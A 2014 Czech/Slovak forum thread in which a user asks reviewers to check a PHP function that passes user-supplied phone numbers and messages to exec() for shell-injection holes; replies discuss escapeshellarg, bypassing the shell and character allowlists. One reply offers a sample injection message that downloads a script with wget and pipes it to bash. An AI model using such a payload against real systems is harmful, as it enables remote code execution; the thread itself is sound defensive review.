Portál AbcLinuxu, 5. května 2025 18:55

Dotaz: Skontrolujte mi prosím bezpečnosť funkcie

11.12.2014 18:50 Peter
Skontrolujte mi prosím bezpečnosť funkcie
Přečteno: 450×
Odpovědět | Admin
Dobrý deň vám prajem.

Veľmi sprostá otázka a prosba, ale istota je guľomet. Budete taký dobrý a môžete mi skontrolovať prosím či táto funkcia nemá nejakú bezpečnostnú dieru, proste či nejakým spôsobom môže útočník zneužiť bash (keďže samozrejme vstup $Number a $Message je priamo od používateľa):
function smssend($Number,$Message) {                                                                                                                                 
  $Recode=array('ä'=>'a','Ä'=>'A','á'=>'a','Á'=>'A','à'=>'a','À'=>'A','ã'=>'a','Ã'=>'A','â'=>'a','Â'=>'A','č'=>'c','Č'=>'C','ć'=>'c','Ć'=>'C',                       
                'ď'=>'d','Ď'=>'D','ě'=>'e','Ě'=>'E','é'=>'e','É'=>'E','ë'=>'e','Ë'=>'E','è'=>'e','È'=>'E','ê'=>'e','Ê'=>'E','í'=>'i','Í'=>'I',                       
                'ï'=>'i','Ï'=>'I','ì'=>'i','Ì'=>'I','î'=>'i','Î'=>'I','ľ'=>'l','Ľ'=>'L','ĺ'=>'l','Ĺ'=>'L','ń'=>'n','Ń'=>'N','ň'=>'n','Ň'=>'N',                       
                'ñ'=>'n','Ñ'=>'N','ó'=>'o','Ó'=>'O','ö'=>'o','Ö'=>'O','ô'=>'o','Ô'=>'O','ò'=>'o','Ò'=>'O','õ'=>'o','Õ'=>'O','ő'=>'o','Ő'=>'O',                       
                'ř'=>'r','Ř'=>'R','ŕ'=>'r','Ŕ'=>'R','š'=>'s','Š'=>'S','ś'=>'s','Ś'=>'S','ť'=>'t','Ť'=>'T','ú'=>'u','Ú'=>'U','ů'=>'u','Ů'=>'U',                       
                'ü'=>'u','Ü'=>'U','ù'=>'u','Ù'=>'U','ũ'=>'u','Ũ'=>'U','û'=>'u','Û'=>'U','ý'=>'y','Ý'=>'Y','ž'=>'z','Ž'=>'Z','ź'=>'z','Ź'=>'Z');                      
  exec('smssend '.preg_replace('/[^0-9]/','',$Number).' "'.preg_replace('/[^0-9a-zA-Z\+\-\*\/\.\,\:\; ]/','',strtr($Message,$Recode)).'"');                          
}
Vopred vám veľmi pekne ďakujem za ochotu.

Řešení dotazu:


Nástroje: Začni sledovat (1) ?Zašle upozornění na váš email při vložení nového komentáře.

Odpovědi

Fuky avatar 11.12.2014 22:11 Fuky | skóre: 52 | blog: 4u
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Odpovědět | | Sbalit | Link | Blokovat | Admin

Pro převod na ASCII bych využíval standartní funkce dostupné v konkrétním prostředí:

PHP

setlocale(LC_CTYPE, 'cs_CZ');
echo iconv('UTF-8', 'ASCII//TRANSLIT', "Příšerně žluťoučký kůň úpěl ďábelské ódy.");

Bash

$ echo "Příšerně žluťoučký kůň úpěl ďábelské ódy." |enca -C extern -E cstocs -x ascii -L cs_CZ
Priserne zlutoucky kun upel dabelske ody.

Python

$ echo "Příšerně žluťoučký kůň úpěl ďábelské ódy." |python -c 'import sys, unicodedata; print unicodedata.normalize("NFKD", sys.stdin.read().decode("utf-8")).encode("ascii", "ignore")'
Priserne zlutoucky kun upel dabelske ody.

Co se týče zneužití fce exec(), tak mě na první pohled nic nenapadá.

-- RÁMO: psí tábor , ETriatlon: Výuka plavání
Fuky avatar 11.12.2014 22:28 Fuky | skóre: 52 | blog: 4u
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Josef Kufner avatar 12.12.2014 01:10 Josef Kufner | skóre: 70
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Na volání shellu je nutné zadávané hodnoty escapovat, podobně jako v SQL. Použij funkci escapeshellarg:
exec('smssend '.escapeshellarg($number).' '.escapeshellarg($message));
Hello world ! Segmentation fault (core dumped)
Fuky avatar 12.12.2014 09:41 Fuky | skóre: 52 | blog: 4u
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie

Podívej se na:

' "'.preg_replace('/[^0-9a-zA-Z\+\-\*\/\.\,\:\; ]/','',strtr($Message,$Recode)).'"'

Řekl bych, že tazatel si uvědomuje podstatu problému a zná fci escapeshellarg(), ale chce mít ve zprávě potencionálně nebezpečné znaky '*', ';' bez zpětného lomítka. A mě nenapadá, jak je v té jeho konstrukci zneužít, když začíná a končí řetězec pomocí uvozovek a zároveň podle mě nenechal k dispozici žádný znak, který by umožnil řetězec ukončit ze strany uživatele a provést spuštění vlastního příkazu. Nebo tě napadá nějaká konkrétní možnost zneužití?

Fuky avatar 12.12.2014 09:50 Fuky | skóre: 52 | blog: 4u
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie

Teď mě napadá, tazatel ještě nezmínil jaké argumenty umožňuje přijímat program smssend, mmj. bych omezil velikost uživatelského vstupu na maximální požadovanou velikost zprávy.

Security issues with using PHP's escapeshellarg
Breaking escapeshellarg() news

12.12.2014 15:30 petr_p | skóre: 59 | blog: pb
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
A proto je nejlepší shell z toho celého cirkusu vynechat. Obzvlášť, když netuší, jaký shell se vůbec použije (od toho se odvíjí escapovaní). Ten programovací jazyk (PHP?) nemá funkci na execve(2)?
Josef Kufner avatar 12.12.2014 17:31 Josef Kufner | skóre: 70
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Má: pcntl_exec. A máš pravdu, je to mnohem lepší řešení, jen to má takový drobný nedostatek: execve ani pcntl_exec neprohledává $PATH, což je celkem otrava.

Navíc pokud chceš pracovat s stdio onoho programu, je lepší použít funkci proc_open, která umí přesměrovávat všechny filedescriptory dle libosti. Ale tady se zas použije shell a s tím je potřeba i escapovat argumenty.
Hello world ! Segmentation fault (core dumped)
12.12.2014 19:09 petr_p | skóre: 59 | blog: pb
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Drobný nedostatek lze řešit posixovým execvp(3). (Jen je třeba pamatovat, že za neexistence proměnné PATH je chování nedefinováno; například glibc se pak dívá do pracovního adresáře.)
12.12.2014 15:38 pet
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Odpovědět | | Sbalit | Link | Blokovat | Admin
V tom $Recode ti chybí mnoho znaků, např. ç a Ç. Použij raději standartní funkce jak doporučuje Fuky výše.
Jendа avatar 13.12.2014 00:38 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Odpovědět | | Sbalit | Link | Blokovat | Admin
Není, escapuješ diakritiku, ale já ti tam můžu napsat zprávu "; wget backdoor.hrach.eu -q -O - | bash;" a je to.
13.12.2014 01:12 z
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
A je co? Prdlačky.
Jendа avatar 13.12.2014 01:44 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Aha, dělá ještě preg_replace.

Doporučil bych to ale dělat naopak, tj. mít seznam povolených znaků, nikoli zakázaných. (no a nebo nejlíp ty jiné metody spouštění příkazu, které jsou výše)
Fuky avatar 13.12.2014 09:22 Fuky | skóre: 52 | blog: 4u
Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
Zkus se podívat podrobněji na to co skutečně dělá kód tazatele a pak přehodnoť text svých příspěvků. ;-)

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.